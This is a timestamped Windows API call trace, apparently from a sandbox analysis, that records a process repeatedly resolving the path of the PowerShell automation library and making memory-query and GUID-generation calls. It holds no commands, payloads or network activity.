	[0094.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.437] VirtualQuery (in: lpAddress=0x16b720, lpBuffer=0x16c5e0, dwLength=0x30 | out: lpBuffer=0x16c5e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.438] VirtualQuery (in: lpAddress=0x16b7b0, lpBuffer=0x16c670, dwLength=0x30 | out: lpBuffer=0x16c670*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.439] VirtualQuery (in: lpAddress=0x16b9d0, lpBuffer=0x16c890, dwLength=0x30 | out: lpBuffer=0x16c890*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.439] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x865b160c, Data2=0x1ad4, Data3=0x4b3e, Data4=([0]=0xbc, [1]=0x87, [2]=0x2c, [3]=0x40, [4]=0x98, [5]=0x5a, [6]=0x8d, [7]=0xe2))) returned 0x0
	[0094.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.441] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x2e4eadca, Data2=0x6379, Data3=0x4dda, Data4=([0]=0xbe, [1]=0xf9, [2]=0xfc, [3]=0x1c, [4]=0x28, [5]=0xf0, [6]=0x16, [7]=0x93))) returned 0x0
	[0094.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.442] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xd93356fc, Data2=0xa2cb, Data3=0x4d95, Data4=([0]=0xa1, [1]=0x3a, [2]=0xa7, [3]=0x4b, [4]=0x13, [5]=0x8e, [6]=0x43, [7]=0x7a))) returned 0x0
	[0094.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.501] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x3d8838cc, Data2=0xc1b7, Data3=0x4bb4, Data4=([0]=0x89, [1]=0xad, [2]=0xd9, [3]=0x6d, [4]=0x17, [5]=0x72, [6]=0xbf, [7]=0x44))) returned 0x0
	[0094.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.502] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x528a4e29, Data2=0xe214, Data3=0x4439, Data4=([0]=0xb6, [1]=0xc7, [2]=0x0, [3]=0x52, [4]=0xf9, [5]=0xf3, [6]=0xe3, [7]=0xd4))) returned 0x0
	[0094.503] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x420107fd, Data2=0xc076, Data3=0x40e3, Data4=([0]=0xb2, [1]=0xbb, [2]=0xd4, [3]=0xc0, [4]=0x83, [5]=0x19, [6]=0x4, [7]=0x2c))) returned 0x0
	[0094.503] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xebd27ff7, Data2=0x6cb, Data3=0x49e1, Data4=([0]=0x8f, [1]=0x1, [2]=0x4f, [3]=0xea, [4]=0x9a, [5]=0x58, [6]=0xc6, [7]=0xa9))) returned 0x0
	[0094.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.504] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xb1196c1, Data2=0xb484, Data3=0x402e, Data4=([0]=0xac, [1]=0x8f, [2]=0x7b, [3]=0x88, [4]=0xb2, [5]=0x6e, [6]=0xfa, [7]=0xf1))) returned 0x0
	[0094.504] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
